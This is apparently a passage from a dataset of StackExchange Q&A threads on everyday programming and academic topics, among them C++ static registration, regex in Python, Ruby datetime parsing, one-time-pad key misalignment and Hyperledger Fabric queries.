variable name making such as using a string constructed).\nHere is a quick example I was able to make (http:\/\/ideone.com\/Wi1JBq)\n<code>#include <iostream>\n#include <vector>\n\nusing namespace std;\n\nstatic vector<string> test;\n\ntemplate <char const *str>\nstruct EnvVar\n{\n EnvVar()\n {\n test.push_back(string(str));\n }\n const char* GetEnvVarName() const\n {\n return str;\n }\n};\n\nstatic void checkVars()\n{\n for(unsigned int i = 0; i < test.size(); i++)\n cout << \"Predefined : \" << test[i] << endl;\n}\n\n#define GENERATE_ENV_VAR(Name) char _##Name[] = #Name; static EnvVar<_ ## Name> Name;\n\n\/\/ ----- What is actually in the user file -----\n\nGENERATE_ENV_VAR(FirstEnvVar)\nGENERATE_ENV_VAR(SecondEnvVar)\nGENERATE_ENV_VAR(ThirdEnvVar)\n\nint main()\n{\n checkVars();\n cout << \"Usage : \" << FirstEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << SecondEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << ThirdEnvVar.GetEnvVarName() << endl;\n return 0;\n}\n<\/code>\nThis outputs \n<code>Predefined : FirstEnvVar\nPredefined : SecondEnvVar\nPredefined : ThirdEnvVar\nUsage : FirstEnvVar\nUsage : SecondEnvVar\nUsage : ThirdEnvVar\n<\/code>\nIt's quite obvious why it does so, the macro being used at the global level, this is initialized before the main is entered, that is why the first function calls know about them. What I want to do is not have those, so basically, have this :\n<code>int main()\n{\n checkVars();\n cout << \"Usage : \" << FirstEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << SecondEnvVar.GetEnvVarName() << endl;\n cout << \"Usage : \" << ThirdEnvVar.GetEnvVarName() << endl;\n return 0;\n}\n<\/code>\nand get the same output. I'm sure it would involve a lot of template\/macro hacking but it would be great. I would prefer not just having a script that parses the code and generate code but I know this could be a solution. I want pure C++ if possible, boost can be fine.\nThank you.\nAnswer: Why does it need to be a template class? You should just be able to pass <code>#NAME<\/code> into a constructor that accepts <code>const char *<\/code>. The run time will call constructors for all file-scope variable instances before reaching your code in <code>main<\/code>.\n<code>class EnvVar\n{ \n private:\n const char *const str;\n\n public:\n static vector<string> env_vars;\n\n EnvVar(const char *str_) : str(str_)\n {\n env_vars.push_back(string(str_)); \/\/ this vector seems redundant...\n }\n const char* GetEnvVarName() const\n {\n return str;\n }\n};\n\n#define GENERATE_ENV_VAR(Name) EnvVar Name##_( #Name );\n\nGENERATE_ENV_VAR(FirstEnvVar)\nGENERATE_ENV_VAR(SecondEnvVar)\nGENERATE_ENV_VAR(ThirdEnvVar)\n<\/code>\nYou'll also notice that I moved your underscore to the end of the variable name, as leading underscores followed by uppercase letters are reserved to the compiler.\nAlso, the <code>vector<string><\/code> seems redundant. It may actually make more sense to have a central registry of <code>EnvVar<\/code> pointers that the class registers itself with, like this:\n<code>class EnvVar\n{ \n private:\n const char *const str;\n\n public:\n static vector<class EnvVar *> registry;\n\n EnvVar(const char *str_) : str(str_)\n {\n registry.push_back(this); \/\/ register ourselves\n }\n const char* GetEnvVarName() const\n {\n return str;\n }\n};\n<\/code>\nThen you can always walk through the complete registry of environment variables by iterating over <code>EnvVars::registry<\/code>. \nComment: but to fill the static vector, you need to go over the code. 
The point is that the code has not been over the code at that point yet. I want the GENERATE_ENV_VAR to be gone from the local scope. The point of it being a template class was me doing a test, because it generates code.\nComment: I see, you want to eliminate those macros at the global level. I missed that paragraph in the middle. Yeah, I don't see a way of, at compile time, generating this list. You might be able to do something really gross with `static` variables. Let me try something and get back to you.\nComment: Never mind... that won't work either because `static` vars aren't initialized until the block gets reached.\nComment: Quite a complex problem huh? Really been bugging my mind for a while.\nComment: Yeah, you might be better off with a post-processing script that runs `nm` on all the objects, looks for symbols with a particular name pattern, and then builds a table in a separate .cpp that gets compiled in at the end. (ie. solve it in the build process if you can.)\n","meta":{"source":"stackoverflow","title":"Compile-time usage introspection","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to check if 0 polynomial lies in span of some polynomials?\n\nQuestion: I have lot of polynomials like this\n<code>f1[a1_,x1_] := (a1 x1 + 1 - x1)\n\nf2[a2_,x2_] := (a2 x2 + 1 - x2)\n\nf3[a1_,x1_,a2_,x2_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)\n\nf4[a1_,x1_,a2_,x2_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)*x2\n\nf5[a1_,x1_,a2_,x2_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)*(a1 x1 + 1 - x1)\n\nf6[a1_,x1_,a2_,x2_,a3_,x3_] := (a1 x1 + 1 - x1)*(a2 x2 + 1 - x2)*(a3 x3 + 1 -x3)\n<\/code>\nand so on...\nI want to know what integer linear combinations of these polynomials would result in a 0 polynomial. That is, I want to the set of all solutions for \n<code>c1 f1 + c2 f2 + c3 f3 + c4 f4 + c5 f5 + c6 f6 = 0\n<\/code>\nWhen I enter \n<code>Solve[c1 f1[a1_,x1_] + c2 f2[a2_,x2_] + c3 f3[a1_,x1_,a2_,x2_] + c4 f4[a1_,x1_,a2_,x2_] + c5 f5[a1_,x1_,a2_,x2_] + c6 f6[a1_,x1_,a2_,x2_,a3_,x3_] == 0, {c1,c2,c3,c4,c5,c6}]\n<\/code>\nmathematica just expresses one variable in terms of all others. That's not what I want. I want all non-trivial integer solutions for c1, c2, c3, c4, c5, c6 (some of them could be zero) such that the above equation is satisfied for all values of x1,x2,x3,a1,a2,a3. \nI could try to expand my polynomials and express it as a set of linear equations Mc=0, where the matrix M represents the coefficients of the polynomials. But unfortunately, when I expand my polynomials, they have exponential number of monomials, and I could not use this method even when problem size becomes bigger. \nAre there better ways to solve my problem?\nComment: [`SolveAlways`](https:\/\/reference.wolfram.com\/language\/ref\/SolveAlways.html)?\nComment: To start with, [`Blank`](http:\/\/reference.wolfram.com\/language\/ref\/Blank.html) is used on the LHS in the definition of a function, not when calling the function.\nComment: `FindInstance`?\nComment: You could substitute random integers for your variables.\nAnswer: You could try <code>SolveAlways<\/code>, but it only returns the trivial solution:\n<code>SolveAlways[\n c1 f1[a1,x1] + c2 f2[a2,x2] + c3 f3[a1,x1,a2,x2] + c4 f4[a1,x1,a2,x2] +\n c5 f5[a1,x1,a2,x2] + c6 f6[a1,x1,a2,x2,a3,x3] == 0,\n {x1,x2,x3,a1,a2,a3}\n]\n<\/code>\n\n{{c4 -> 0, c5 -> 0, c3 -> 0, c6 -> 0, c1 -> 0, c2 -> 0}}\nComment: That's nice! 
When I tried only some polynomials, mathematica gave an answer like {{b3 -> 0, b4 -> 0, b5 -> 0, b6 -> 0, b1 -> d9, d1 -> -d9, b2 -> d7, \n d2 -> -d7, d4 -> d7, d5 -> 0, d3 -> -d6 + d9, d8 -> 0}}. From this list, is there a way I could extract individual values, and substitute d7, d9, d6 with some numbers?\nComment: SolveAlways seems like a powerful tool. May I know how it works? For my application, the polynomials have small factors but I when I write it in canonical form, the polynomials have exponential number of monomials. Efficiency is my concern. If SolveAlways internally expands all the polynomials and expresses it as solving equation of Mc = 0. Then, it might not be efficient enough for my application.\n","meta":{"source":"mathematica.stackexchange","title":"How to check if 0 polynomial lies in span of some polynomials?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are any archeological remains found from the Yellow Sea, China\n\nQuestion: During the last ice age when the sea level was lower, much of the continental shelf was exposed. For example, the North Sea was previously a low-lying region which is called \"Doggerland\".\nThere are multiple finds of bone fish-spears, flint axes and so on. Some are found by dredging, some by divers. These provide evidence that the region was inhabited by Mesolithic peoples. source1 source2 source3 \nAt that time the Yellow Sea, and particular the Bo Hai Bay, was above sea-level. And Neolithic China was featured multiple sites around the Yellow Sea. source4\nIs there archaeological evidence that the Bo Hai Bay and the Yellow Sea region were inhabited at the end of the ice age? Have there been any archaeological finds from the seabed?\nComment: I know this is the South China Sea, not the Yellow, but it is speculated that the ancestors of most modern native New Guinea highlanders actually *walked* there back when sea levels were lower. So there should be stuff to find, if one knew where to look.\nAnswer: My understanding is that Bohai Bay used to be an inland lake which drained into the Yellow Sea. The southern border of the lake was formed by the Liaodong and Shandong peninsulas, which were once joined.\nRemains of Pleistocene mammoth and woolly rhinoceros have been found in the bay, but, as far as I am aware, no human artefacts comparable with those found in \"Doggerland\" under the modern North Sea have yet been recovered.\nAs you say, a number of Neolithic cultures have been identified from sites around Bohai Bay, and there have been suggestions that there is evidence for \"economic contact\" between at least some of these groups (mentioned in the book linked above).\nIt makes sense that an area with readily available sources of food and water would have been attractive for human habitation at the end of the Pleistocene Ice Age. However, I've searched through the last 30 years of the International Journal of Nautical Archaeology, and I can't find any reports of significant evidence for human habitation from underwater archaeology in the region. (For comparison, I found more than 50 articles about remains from \"Doggerland\" while searching)\nComment: I came back to correct my incorrect correction, but you already fixed it.... \"two countries separated by a common language\".\nComment: Note: the spelling of [artefacts](https:\/\/en.oxforddictionaries.com\/definition\/artefact) isn't a typo.\nAnswer: The Yellow Sea flood plain has very rich soil with a climate very suitable for human habitation. 
I suspect that it was one of the major population centers during the last Ice Age. It would have been subject to a rapid and catastrophic flood when the ice dams broke raising the Sea level.\nSome very high volume rivers carry large amounts of silt into the Yellow Sea. Archeological evidence, if it exists, would probably be buried deep.\n","meta":{"source":"history.stackexchange","title":"Are any archeological remains found from the Yellow Sea, China","dup_signals":{}},"subset":"stackexchange"} +{"text":"Trying to open and read files with fstream and sstream\n\nQuestion: <code>#include <string>\n#include <fstream>\n#include <sstream>\n#include <iostream>\n\nint main()\n{\n const char* path = \"C:\\Dev\\devAstroides\\printFileToScreen\\Hello.txt\";\n std::string Code;\n std::ifstream File;\n File.exceptions(std::ifstream::failbit | std::ifstream::badbit);\n try\n {\n \/\/ open files\n File.open(path);\n std::stringstream Stream;\n \/\/ read file's buffer contents into streams\n Stream << File.rdbuf();\n \/\/ close file handlers\n File.close();\n \/\/ convert stream into string\n Code = Stream.str();\n }\n catch (std::ifstream::failure & e)\n {\n std::cout << \"ERROR::FILE_NOT_SUCCESFULLY_READ\" << std::endl;\n }\n\n std::cout << Code.c_str();\n}\n<\/code>\nThis is supposed to open a text file and print its content to the console.\nBut it doesn't work. The error message is always triggered and it doesn't print the file!\nI also wonder how one can replace the full file-path with a relative one, so it works on other computers, or if the project is moved.\nComment: `\\\u200b` is used for escape sequence in C++. You should use `\\\\\u200b` to represent `\\\u200b` in strings.\nComment: Using \/ as the path separator is also permitted in windows unless you are using unc paths. And you don't escape that.\nComment: I would expect that your compiler would warn you about invalid escape sequences.\nAnswer: If you output your path\n<code>const char* path = \"C:\\Dev\\devAstroides\\printFileToScreen\\Hello.txt\";\nstd::cout << path;\n<\/code>\nyou'll find the output is actually\n<code>C:DevdevAstroidesprintFileToScreenHello.txt \n<\/code>\nAs @MikeCAT pointed out you need to double escape your slashes by doubling them up. Like so\n<code>const char* path = \"C:\\\\Dev\\\\devAstroides\\\\printFileToScreen\\\\Hello.txt\";\n<\/code>\nSee below:\nhttps:\/\/en.cppreference.com\/w\/cpp\/language\/escape\nWith regards to a relative path, if your folders will sit with the executable in the same place then you can just use a relative path like normal. For example if there is a text file in the same folder as the application you can just set the path to\n<code>const char* path = \"Hello.txt\";\n<\/code>\nComment: In C++11 and later, you can alternatively use a [raw string literal](https:\/\/en.cppreference.com\/w\/cpp\/language\/string_literal) instead, then you don't need to ecape the ```\\``` characters: `const char* path = R\"(C:\\Dev\\devAstroides\\printFileToScreen\\Hello.txt)\";`\nComment: As for using relative paths, you are assuming the process's *working directory* is the same as the folder containing the EXE, but that is not a guarantee. You really should avoid using relative paths altogether, always use absolute paths. 
If you need to access paths relative to the EXE's location, then retrieve the EXE's actual location at runtime (from `main()`'s `argv[0]` parameter, or platform APIs like `GetModuleFileName()`, etc) and then manipulate that value to create full paths as needed.\n","meta":{"source":"stackoverflow","title":"Trying to open and read files with fstream and sstream","dup_signals":{}},"subset":"stackexchange"} +{"text":"Access 2007 Crosstab Query Expression\n\nQuestion: Goal: to create a percentage column based off the values of calculated columns.\nHere's the SQL code of the Crosstab query:\n<code>TRANSFORM Count(Master_Calendar.ID) AS CountOfID\nSELECT Master_Calendar.Analyst, Count(Master_Calendar.ID) AS [Total Of ID]\nFROM Master_Calendar\nGROUP BY Master_Calendar.Analyst\nPIVOT Master_Calendar.[Current Status];\n<\/code>\nThis gives me a crosstab query that displays the amount of entries in the database that are \"Completed\", \"In Process\", or \"Not Started\", sorted by which Analyst they belong to.\nWhat I'm trying to do is add another column to calculate the Percent Complete -- so (Completed \/ Total of ID) * 100. I tried putting that into an expression in another cell, but it returns with a \"[Completed]\" not found, even though it gives me it as an option in the Expression Builder.\nAm I just naming my variables wrong, or is it not possible to do it this way? Can I reference the total count of the records that contain \"Completed\" using query code instead of finding out the value using a Pivot table?\nThanks for your help.\nComment: You can use the crosstab query as if it were a table. Add it to the query design window and build the percentage column as you would for a table. Does this suit?\nComment: That's what I tried to do, but I can't get the expression correct\/valid.\nAnswer: Try:\n<code>SELECT \n xTab.Analyst,\n [Completed]\/([Total of ID]\/100) AS [Complete%], \n [In Process]\/([Total of ID]\/100) AS [In Process%],\n [Not Started]\/([Total of ID]\/100) AS [Not Started%]\nFROM xTab;\n<\/code>\nComment: Perfect -- didn't realize I should query a query. Thanks.\n","meta":{"source":"stackoverflow","title":"Access 2007 Crosstab Query Expression","dup_signals":{}},"subset":"stackexchange"} +{"text":"Secure multiparty computation protocols for stable matching?\n\nQuestion: Are you aware of papers proposing secure multiparty computation protocols for stable matching problems such as Stable Roommates and Stable Marriage problems?\nSpecifically, I would like the ranking of each party to be kept private and either reveal the whole output to everybody (all the pairings) or just reveal each pairing to the involved parties.\nComment: It can be done using a general MPC protocol, but I'm assuming you want something more efficient?\nComment: Yes, if it is not available yet, I would like to develop something ad-hoc that is efficient.\nAnswer: Is this what you were looking for? \nSecure Stable Matching at Scale by Jack Doerner, David Evans, and abhi shelat.\n","meta":{"source":"crypto.stackexchange","title":"Secure multiparty computation protocols for stable matching?","dup_signals":{}},"subset":"stackexchange"} +{"text":"One-time pad mistake in the transmission?\n\nQuestion: I have a question which arised by analyzing the one-time pad cipher. I encrypt a binary sequence $a_1,a_2,..,a_N$ using a one-time pad with key sequence $k_1,k_2,k_3,...$, so I send $a_1+k_1, a_2+k_2,\\dotsc,a_n+k_N$.\nNow I make mistake and instead of sending the above sequence I transmit $a_1+k_2,...,a_N+k_{N+1}$. 
Assuming now that you know that I made this error and that my message makes sense, can you find the message?\nRemark: Using a one-time pad means I encipher a message as $b_1b_2\\dots b_N$ where $b_j\\equiv a_j+k_j \\pmod q$ where $q$ is the size of the alphabet, in our case $q=2$.\nAnswer: Assuming that you have not used the one-time pad bits $k_2, ..., k_{N+1}$ to encrypt another message, then the answer is no, the attacker cannot determine the message.\nThis can be seen by using the normal proof of One Time Pad's security; the bits $k_2, ..., k_{N+1}$ are random and uncorrelated to any other bits the attacker has access to; hence the attacker gets no information on the values of $a_1, ..., a_N$ from the sequence $a_1+k_2, ..., a_N+k_{N+1}$. That those random uncorrelated bits are not the precise ones that you intended to use is irrelevant.\nOn the other hand, if the sender realized his mistake, and then sent $a_1+k_1, a_2+k_2, ..., a_N+k_N$, at that point, the attacker could deduce information about the message. This violates the restriction that \"bits from the one time pad are used only once\", and this actually allow the attacker to deduce the original message (or its complement).\nComment: Thanks for your answer. How would the attacker proceed at the point he has access to both sequences?\nComment: @TIJones: Well, he has both $a_1+k_2$ (from the first message) and $a_2+k_2$ (from the second); that gives him $a_1+a_2$. From that, he can (with $a_2+k_3$ and $a_3+k_3$) compute $a_1+a_3$. Continuing, he can reconstruct $a_1+a_i$ for all $i$. That, plus a guess of $a_1$, gives him the entire message.\n","meta":{"source":"crypto.stackexchange","title":"One-time pad mistake in the transmission?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Published URL File APP.CSS\n\nQuestion: I am crossing an analysis on a website and while fuzzing and testing I came across the below URL:\n<code>https\/\/www.****.**.*\/content\/css\/app.css\n<\/code>\nWhich generated the below output:\n<code>\/* Minification failed. Returning unminified contents.\n(856,107): run-time error CSS1036: Expected expression, found '}'\n(1838,90): run-time error CSS1019: Unexpected token, found '.'\n(1838,90): run-time error CSS1042: Expected function, found '.'\n(1838,90): run-time error CSS1019: Unexpected token, found '.'\n(1838,90): run-time error CSS1042: Expected function, found '.'\n(1838,90): run-time error CSS1062: Expected semicolon or closing curly-brace, found '.'\n(2353,12): run-time error CSS1038: Expected hex color, found '#fff9'\n(2353,17): run-time error CSS1062: Expected semicolon or closing curly-brace, found ' '\n *\/\n\/*!\n * Bootstrap v3.3.7 (http:\/\/getbootstrap.com)\n * Copyright 2011-2016 Twitter, Inc.\n * Licensed under MIT (https:\/\/github.com\/twbs\/bootstrap\/blob\/master\/LICENSE)etc.......\n<\/code>\nThe app.css should be accessible knowing that content and css directories are forbidden from server side. \nThe Question I am searching an answer for:\nDoes App.Css pose any security threat or issue from information disclosure perspective or can it be considered a vulnerability while published or is it a normal behavior ?\nComment: Why should the content and css directories be forbidden from server side?\nAnswer: It's a bit unusual to publish a CSS file which the minify process failed on, and may be indicative of other issues (e.g. insufficient monitoring of the deployment process), but CSS files are used by end user browsers, so the content shouldn't be sensitive. 
At most, it might include styles which are applied to pages or controls which the current user doesn't have access to, but applications should not rely on styling for access control, so this should not cause problems in a sensibly designed application.\n","meta":{"source":"security.stackexchange","title":"Published URL File APP.CSS","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python multiline regular expression\n\nQuestion: <code>input = \"\"\"\nendless gibberish\nsome more stuff\n\ncolor texture mytexture\n [640 480 1]\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n 'BF4C16FFBF4C16FFBE4B15FFBE4B15FFBC4913FFBC4913FFBC4913FFBB4812FFBC4913FF'\n 'BC4A14FFBB4913FFBB4812FFBB4812FFBA4812FFBA4812FFBB4913FFBC4A16FFBB4915FF'\n 'B84612FFB84612FFB94713FFB84612FFB64410FFB64410FFB64410FFB4420EFFB3410DFF'\n 'FB03E0AFFB13F0BFB13F0BFFAE3C08FFAA3804FFAD3B07FFB03E0AFFB3410DFFB4420EFF'\n 'B4400DFFB13D0AFFB23C0AFFB03C09FFB23E0BFFB5410EFFB74310FFB94512FFB84411FF'\n\ncolor texture mytexture2\n [640 480 1]\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n (... etc...)\n\n\"\"\"\n<\/code>\nNeed to get the stuff between the brackets and the binary blob data after the line with \"texture\" until the empty line is reached. There's several \"texture\" paragraphs.\nHere's what I got thus far:\n<code>p = re.compile(r'texture\\s+(\\S+)\\s+\\[(\\d+\\s+\\d+\\s+\\d+)\\]\\s+(\\'.+\\')')\nmatches = p.findall(data)\n for match in matches:\n print match[0]\n print match[1]\n print match[2]\n print \"---------------\"\n<\/code>\nGives the following output:\n<code> mytexture\n 640 480 1\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n ---------------\n mytexture2\n 640 480 1\n 'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n ---------------\n<\/code>\nI'm pretty sure re.MULTILINE should be used to get the whole blob, but its unclear to me how to grab all binary lines.\nMy question basically is: how does one grab multiple lines and know when to \"stop\" (ie: the empty line is reached).\nAnswer: <code>re.MULTILINE<\/code> affects the meaning of the <code>^<\/code> and <code>$<\/code> anchors. What I think you want here is <code>re.DOTALL<\/code>, without which the <code>.<\/code> character will never match a newline.\nTo match all of the text up to the next blank line, you'd use something like <code>(.*?)\\n\\s*\\n<\/code>. 
This seems to do what you're looking for?\n<code>p = re.compile(r'texture\\s+(\\S+)\\s+\\[(\\d+\\s+\\d+\\s+\\d+)\\]\\s+(.*?)\\n\\s*\\n', re.DOTALL)\nmatches = p.findall(input)\nfor match in matches:\n print match[0]\n print match[1]\n print match[2]\n print \"---------------\"\n<\/code>\nOn your sample text, this produces:\n<code>mytexture\n640 480 1\n'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n 'BF4C16FFBF4C16FFBE4B15FFBE4B15FFBC4913FFBC4913FFBC4913FFBB4812FFBC4913FF'\n 'BC4A14FFBB4913FFBB4812FFBB4812FFBA4812FFBA4812FFBB4913FFBC4A16FFBB4915FF'\n 'B84612FFB84612FFB94713FFB84612FFB64410FFB64410FFB64410FFB4420EFFB3410DFF'\n 'FB03E0AFFB13F0BFB13F0BFFAE3C08FFAA3804FFAD3B07FFB03E0AFFB3410DFFB4420EFF'\n 'B4400DFFB13D0AFFB23C0AFFB03C09FFB23E0BFFB5410EFFB74310FFB94512FFB84411FF'\n---------------\nmytexture2\n640 480 1\n'BE4C16FFBD4B15FFBD4B15FFBD4B15FFBD4B15FFBE4C16FFBE4C16FFBD4B15FFBD4B15FF'\n 'BE4C16FFBE4C16FFBD4B15FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBC4A14FFBE4C16FF'\n (... etc...)\n---------------\n<\/code>\nComment: Yes, this is exactly what i was looking for, thanks! I attemped re.DOTALL too, but failed to make the regexp \"stop\" on the empty line. Hence the `(.*?)\\n\\s*\\n` and DOTALL saves my day. Guess I was misunderstanding the MULTILINE flag too :S\nComment: I always have to go back and reread the documentation before using re.MULTILINE to make sure I'm using it properly. :-P\nAnswer: You were spot on, just didn't get so far as to actually implement it ;)\n<code>import re\n\ninput = \"\"\"\nendless gibberish\nsome more stuff\n\ntexture mytexture\n '01AB01AB01AB01BA'\n '01AB01AB01AB01BA'\n '01AB01AB01AB01BA'\n '01AB01AB01AB01BA'\n\n\"\"\"\n\nmatches = re.findall(r'01AB01AB01AB01BA', input, re.M)\nprint matches\n<\/code>\nComment: It makes me wonder if the OP even tried anything, since all you did is take their words and translate them directly into code.\nComment: My bad. And I was rightly punished by -2 rep. 
Hope the edited post is more clear.\n","meta":{"source":"stackoverflow","title":"Python multiline regular expression","dup_signals":{}},"subset":"stackexchange"} +{"text":"Convert string datetime to Ruby datetime\n\nQuestion: How do I convert this \"2013-10-20 18:36:40\" into a Ruby datetime?\nI'm trying the following, but it's not working:\n<code>\"2013-10-20 18:36:40\".to_datetime\n<\/code>\nThat's making it this and missing the time:\n<code>2013-10-20 00:00:00 UTC\n<\/code>\nComment: Your code will work if you precede it with `require 'active_support\/all'` (or just `require 'active_support\/core_ext\/string\/conversions'`) if you don't want to load it all.\nAnswer: Use <code>DateTime::strptime<\/code>:\n<code>require 'date'\nDateTime.strptime(\"2013-10-20 18:36:40\", \"%Y-%m-%d %H:%M:%S\")\n#<DateTime: 2013-10-20T18:36:40+00:00 ((2456586j,67000s,0n),+0s,2299161j)>\n<\/code>\nAnswer: There is also <code>DateTime#parse<\/code> method:\n<code>2.1.0 :001 > require 'date'\n => true \n2.1.0 :002 > DateTime.parse('2013-10-20 18:36:40')\n => #<DateTime: 2013-10-20T18:36:40+00:00 ((2456586j,67000s,0n),+0s,2299161j)> \n<\/code>\nIf your work with rails consider writing timezone-safe code:\n<code>Time.zone.parse(\"2013-10-20 18:36:40\")\n<\/code>\nhttp:\/\/www.elabs.se\/blog\/36-working-with-time-zones-in-ruby-on-rails\nAnswer: You can do the following if rails is installed on your system:--\n<code>require 'active_support\/core_ext\/string\/conversions'\n\n\"2013-10-20 18:36:40\".to_time\n\n1.9.2p320 :001 > require 'active_support\/core_ext\/string\/conversions'\n => true\n1.9.2p320 :003 > \"2013-10-20 18:36:40\".to_time\n => 2013-10-20 18:36:40 UTC \n<\/code>\nComment: active_support is available in rails, not in ruby.\n","meta":{"source":"stackoverflow","title":"Convert string datetime to Ruby datetime","dup_signals":{}},"subset":"stackexchange"} +{"text":"Checking if string is not equal to something is not working\n\nQuestion: Why isn't this working? The while loop won't end even when the value of <code>answer<\/code> is <code>\"Y\"<\/code> or <code>\"N\"<\/code> (I checked in the debugger) and I keep getting the Invalid Input message.\n<code> Console.Write(\"\\nYes or No(Y or N): \");\n\n string answer = Console.ReadLine();\n\n while(!answer.Equals(\"Y\") || !answer.Equals(\"N\"))\n {\n invalidInput();\n answer = Console.ReadLine();\n }\n<\/code>\nComment: `while(!answer.Equals(\"Y\") && !answer.Equals(\"N\"))`, notice `&&`\nComment: ANDDDD you need\nComment: Also be careful about case sensitivity...\nComment: @DmitryBychenko shouldn't it be || (OR) instead of && (AND), considering i want the user to pick one instead of both?\n\nEdit: my mistake, it should be with AND.\nComment: If the input was `Y` then `while(!answer.Equals(\"Y\") || !answer.Equals(\"N\"))` means `while(!true || !false)` so `while(false || true)`. It will **always** evaluate to `true`. Always.\nComment: `answer` will always evaluate to not equal to \"Y\" OR \"N\".\nComment: Fixed it, thanks everyone.\nComment: You are thinking of Java - @TimvanPeterson. 
C# doesn't work that way.\nAnswer: In order to avoid such errors (<code>||<\/code> instead of <code>&&<\/code>) put it like this:\n<code> \/\/ StringComparer.OrdinalIgnoreCase - let's ignore case and accept \"n\" or \"YES\"\n Dictionary<string, bool> validAnswers = new Dictionary<string, bool>(\n StringComparer.OrdinalIgnoreCase) {\n { \"Y\" , true},\n { \"N\", false},\n { \"Yes\" , true},\n { \"No\", false},\n \/\/ Add any other responses here, say {\"OK\", true}\n };\n\n Console.Write(\"\\nYes or No(Y or N): \");\n\n bool answer = false;\n\n \/\/ Keep asking while answer is not valid one\n \/\/ .Trim() - let's be nice and allow leading and trailing spaces\n while (!validAnswers.TryGetValue(Console.ReadLine().Trim(), out answer)) {\n invalidInput();\n } \n<\/code>\nComment: @user2366842: I've put `StringComparer.OrdinalIgnoreCase` (and added the comment) to ensure *case insensitive* correspondence. So all `yes`, `YES`, `Yes` will be valid and mapped to `true`\nComment: God damn that was fast. +1\nComment: The only thing this doesn't account for is case sensitivity on the input. Otherwise very nice answer. EDIT: looks good now.\nAnswer: You can put the two conditions in brackets.\nThe following example is also case-insensitive.\n<code>Console.Write(\"\\nYes or No(Y or N): \");\nstring answer = Console.ReadLine();\nwhile (!(answer.ToUpper().Equals(\"Y\") || answer.ToUpper().Equals(\"N\")))\n{\n invalidInput();\n answer = Console.ReadLine();\n}\n<\/code>\nComment: Good call on the case sensitivity. That's something that's often overlooked in questions like this.\nAnswer: A string can never be equal to two different strings. One or both of <code>answer.Equals(\"Y\")<\/code> <code>answer.Equals(\"N\")<\/code> will be false every time. With <code>! ||<\/code> the overall expression will true every time. 
\nI think you are looking for \n<code>!answer.Equals(\"Y\") && !answer.Equals(\"N\")\n<\/code>\nOr \n<code>!(answer.Equals(\"Y\") || answer.Equals(\"N\"))\n<\/code>\n","meta":{"source":"stackoverflow","title":"Checking if string is not equal to something is not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to query a value from a peer using Hyperledger Fabric SDK java\n\nQuestion: I have setup a HyperLedger Fabric V1.0 network with 2 organisations each having 2 peer and an orderer by following the steps Building Your First Network.\nI have started the network using \"sh byfn.sh -m up\" and compiled and executed chaincode that returns value for querying 'a' as 90.\nI want to write a code using Java Fabric SDK to only query a peer for a value using the docker network container started .\nCould you pls share the code segment for the same or give me references\nThanks\nAnswer: <code>\/\/ Channel queries\n\n\/\/ We can only send channel queries to peers that are in the same org as the SDK user context\n\/\/ Get the peers from the current org being used and pick one randomly to send the queries to.\nSet<Peer> peerSet = sampleOrg.getPeers();\n\/\/ Peer queryPeer = peerSet.iterator().next();\n\/\/ out(\"Using peer %s for channel queries\", queryPeer.getName());\n\nBlockchainInfo channelInfo = channel.queryBlockchainInfo();\nout(\"Channel info for : \" + channelName);\nout(\"Channel height: \" + channelInfo.getHeight());\nString chainCurrentHash = Hex.encodeHexString(channelInfo.getCurrentBlockHash());\nString chainPreviousHash = Hex.encodeHexString(channelInfo.getPreviousBlockHash());\nout(\"Chain current block hash: \" + chainCurrentHash);\nout(\"Chainl previous block hash: \" + chainPreviousHash);\n\n\/\/ Query by block number. Should return latest block, i.e. block number 2\nBlockInfo returnedBlock = channel.queryBlockByNumber(channelInfo.getHeight() - 1);\nString previousHash = Hex.encodeHexString(returnedBlock.getPreviousHash());\nout(\"queryBlockByNumber returned correct block with blockNumber \" + returnedBlock.getBlockNumber()\n + \" \\n previous_hash \" + previousHash);\nassertEquals(channelInfo.getHeight() - 1, returnedBlock.getBlockNumber());\nassertEquals(chainPreviousHash, previousHash);\n\n\/\/ Query by block hash. Using latest block's previous hash so should return block number 1\nbyte[] hashQuery = returnedBlock.getPreviousHash();\nreturnedBlock = channel.queryBlockByHash(hashQuery);\nout(\"queryBlockByHash returned block with blockNumber \" + returnedBlock.getBlockNumber());\nassertEquals(channelInfo.getHeight() - 2, returnedBlock.getBlockNumber());\n\n\/\/ Query block by TxID. Since it's the last TxID, should be block 2\nreturnedBlock = channel.queryBlockByTransactionID(testTxID);\nout(\"queryBlockByTxID returned block with blockNumber \" + returnedBlock.getBlockNumber());\nassertEquals(channelInfo.getHeight() - 1, returnedBlock.getBlockNumber());\n\n\/\/ query transaction by ID\nTransactionInfo txInfo = channel.queryTransactionByID(testTxID);\nout(\"QueryTransactionByID returned TransactionInfo: txID \" + txInfo.getTransactionID()\n + \"\\n validation code \" + txInfo.getValidationCode().getNumber());\n<\/code>\nThis is end to end test sample using Java SDK\nComment: this is fine but i want a 